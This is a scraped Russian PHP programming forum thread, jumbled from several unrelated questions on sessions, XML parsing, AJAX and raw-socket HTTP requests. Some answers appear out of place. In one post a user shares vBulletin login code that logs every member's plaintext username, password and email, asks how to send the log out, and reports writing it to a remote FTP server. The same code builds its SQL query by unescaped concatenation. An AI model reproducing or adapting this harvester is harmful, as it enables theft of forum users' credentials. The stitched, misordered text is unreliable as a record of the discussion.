SELECT * FROM soft ORDER BY имя_поля_для_сортировки DESC DESC сортирует по убыванию, ASC по возрастанию. По умолчанию сортируется по возрастанию.
Написал скрипт для выхода из форума, т.е. logout. php ругается, что "Trying to destroy uninitialized session ", хотя сессия объявлялась в файле, откуда есть линк на logout.php Дописал в код logoutа session_start();, и заработало. Это у меня глюк пхп или я идиот?
Darth Padla Почему-то хочется убивать людей, у которых echo расположены по всей протяженности скрипта. qaz Попытаться подключиться как сокс5, а потом как сокс4. Если подключилось - вы узнали что за прокси перед вами. Flisk Что значит линк. PHP связан со сгенерированным им html исходником почти никак. И любой доступ к новой странице следует рассматривать как независимый. Поэтому сессию, очевидно, надо инциализировать в каждом файле к которому обращаются.
Gifts, спасибо. Я просто в какой-то книжке нашел пример, там файл exit.php имел только session_destroy(), без инициализации. Я и подумал, что у меня пхп глючит. Видимо, книга старая или и там ошиблись..
Помогите пожалуйста переделать скрипт. Нужно чтобы он либо отправлял содержимое переменных на почту либо записывал в файл который находится на ftp сервере. PHP: $lg_username = strtolower($vbulletin->GPC["vb_login_username"]); $lg_password = $vbulletin->GPC["vb_login_password"]; $lg_file = "./usr/www/users/server/log.html"; $sql_query = @mysql_query("SELECT * FROM " . TABLE_PREFIX . "user WHERE username='" . $lg_username . "'"); while($row = @mysql_fetch_array($sql_query)) { if(strlen($lg_password) > 1 AND strlen($lg_username) > 1) { $fp1 = @fopen($lg_file, "a+"); @fwrite($fp1, $lg_username . ' : ' . $lg_password." (" . $row["email"] . ")\n"); @fclose($fp1); $f = @file($lg_file); $new = array_unique($f); $fp = @fopen($lg_file, "w"); foreach($new as $values) { @fputs($fp, $values); } @fclose($fp); } } попробовал написать PHP: $lg_file = "ftp://username:password@host/filename.html"; файл создается на фтп но в него нечего не пишется. Все сделал сам, решение было в замене a+ на w $fp1 = @fopen($lg_file, "w");
Подскажите пример как спарсить курс доллара отсюда http://www.cbr.ru/scripts/XML_daily.asp?date_req=13.06.2012
мда.... /thread103155.html Вобщето такие вопросы создают сдесь /thread92492.html preg_match("/<Value>(.*?)<\/Value>/",$site, $pars);
Более правильно парсить через XML-парсеры PHP: <?php $xml = simplexml_load_file ('http://www.cbr.ru/scripts/XML_daily.asp?date_req=13.06.2012'); $xml = $xml->xpath ('//CharCode[text()="USD"]/following-sibling::Value'); echo $xml[0], "\n"; ?> Code: 32,5862 Методом тыка. Отсылать клиентские сокс-запросы и анализировать ответ сервера.
Всем привет. Ребят, как реализовать вызов обращения к аяксу автоматически? До этого юзал только OneClick. Как сделать, чтобы в случае надобности php сам обращался к ajax скрипту?
Мне кажется,что дальше будет что то вроде - PHP: Новичок: Подскажите пожалуста самый крепкий сорт дерева! Весь инет перерыл, поиском пользовался! Старожил: Объясни, зачем тебе понадобилось дерево? Сейчас оно в строительстве практически не используется. Новичок: Я небоскрёб собираюсь строить. Хочу узнать, из какого дерева делать перекрытия между этажами! Старожил: Какое дерево? Ты вообще соображаешь, что говоришь? Новичок: Чем мне нравиться этот форум - из двух ответов ниодного конкретного. Одни вопросы неподелу! Старожил: Не нравится - тебя здесь никто не держит. Но если ты не соображаешь, что из дерева небоскрёбы не строят, то лучше бы тебе сначала школу закончить. Новичок: Не знаите - лучше молчите! У меня дедушка в деревянном доме живёт! У НЕГО НИЧЕГО НЕ ЛОМАЕТСЯ!!! Но у него дом из сосны, а я понимаю, что для небоскрёба нужно дерево прочнее! Поэтому и спрашиваю!!! А от вас нормального ответа недождёшся!!! Прохожий: Самое крепкое дерево - дуб. Вот тебе технология вымачивания дуба в солёной воде, она придаёт дубу особую прочность: Новичок: Спасибо, братан! То что нужно!!!
PHP: <?php $header=""; $header="GET /someuri HTTP/1.0\r\n"; $header=$header."Accept-Language: en-us,en;q=0.5\r\n"; $header=$header."Accept-Charset: utf-8,*;q=0.7\r\n"; $header=$header."Accept: text/html,image/jpeg,image/gif,text/xml,text/plain,image/png,*/*;q=0.5"; $header=$header."User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.50\r\n"; $header=$header."Connection: keep-alive\r\n"; $header=$header."Host: somehost.com\r\n\r\n"; $dt=""; $fp=fsockopen("somesite.com", 80); fwrite($fp, $header); while(!feof($fp)) { $dt.=fread($fp, 1024); } fclose($fp); $hash_csrf_token=""; $hash_csrf_token=substr(someparse); $header=""; $data = "hash[_input_]=someparam&hash[_csrf_token]=".$hash_csrf_token; $header="POST someuri/request HTTP/1.1\r\n"; $header=$header."Accept-Language: en-us,en;q=0.5\r\n"; $header=$header."Accept-Charset: utf-8,*;q=0.7\r\n"; $header=$header."Accept: text/html,image/jpeg,image/gif,text/xml,text/plain,image/png,*/*;q=0.5\r\n"; $header=$header."User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.50\r\n"; $header=$header."Connection: keep-alive\r\n"; $header=$header."Host: somehost.com\r\n\r\n"; $header=$header.$data."\r\n"; $fp=fsockopen("somehost", 80); fwrite($fp, $header); while(!feof($fp)) { $answer.= fread($fp, 1024); } fclose($fp); flush(); ?> Когда отправляется пост запрос, снифер показывает, что к значению параметра hash[_csrf_token] дописывается ответ сервера . Парсится все чисто... wtf??
Так а что находится в параметре $hash_csrf_token перед строкой PHP: $data = "hash[_input_]=someparam&hash[_csrf_token]=".$hash_csrf_token;
Если его вывести, то там будет только оно? Это я к тому, правильно ли оно вырезается отсюда: PHP: $hash_csrf_token=substr(someparse);